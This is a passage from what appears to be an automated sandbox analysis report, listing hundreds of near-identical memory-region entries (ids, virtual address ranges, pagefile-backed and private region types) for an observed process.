pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11801 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11802 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11803 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11804 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11805 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11806 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11807 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11808 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11809 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11810 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11811 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11812 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11813 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11814 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11815 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11816 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11819 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11820 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11821 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11822 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11828 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11830 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11831 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11832 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11833 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11834 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11835 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11836 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11837 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11838 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11839 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11840 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11968 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11969 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11970 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11971 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11972 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11973 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11974 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11975 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11976 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11977 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11978 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11979 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11980 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11981 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11982 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11983 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11984 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11985 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11986 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11987 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11988 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11989 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11990 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11991 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11992 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11993 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11994 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11995 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11996 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11997 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11998 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11999 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12000 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12001 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12002 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12003 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12004 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12005 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12006 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12007 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12008 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12009 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12010 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12011 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12012 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12018 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12019 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12020 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12021 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12022 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12023 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12024 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12025 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12026 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12027 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12028 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12029 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12030 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12031 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12032 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12033 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12034 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12035 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12036 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12037 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12038 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12039 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12040 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12041 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12042 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12043 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12044 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12045 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12046 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12047 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12048 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12049 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12050 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12051 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12052 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12053 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12054 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12055 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12056 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12057 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12058 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12079 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12080 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12081 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12082 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12083 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12084 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12085 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12086 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12087 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12088 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12089 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12090 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12091 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12092 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12093 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12094 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12095 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12096 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12097 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12098 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12249 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12250 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12251 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12252 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12253 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12254 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12255 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12256 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12257 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12258 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12259 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12260 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12261 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12262 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12263 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12264 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12265 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12266 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12267 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12268 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12269 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12270 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12271 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12272 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12273 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12274 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12275 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12276 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12277 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12278 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12279 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12280 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12281 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12282 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12283 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12284 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12285 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12286 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12287 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12288 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12289 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12290 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12291 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12292 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12293 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12294 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12354 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12355 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12356 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 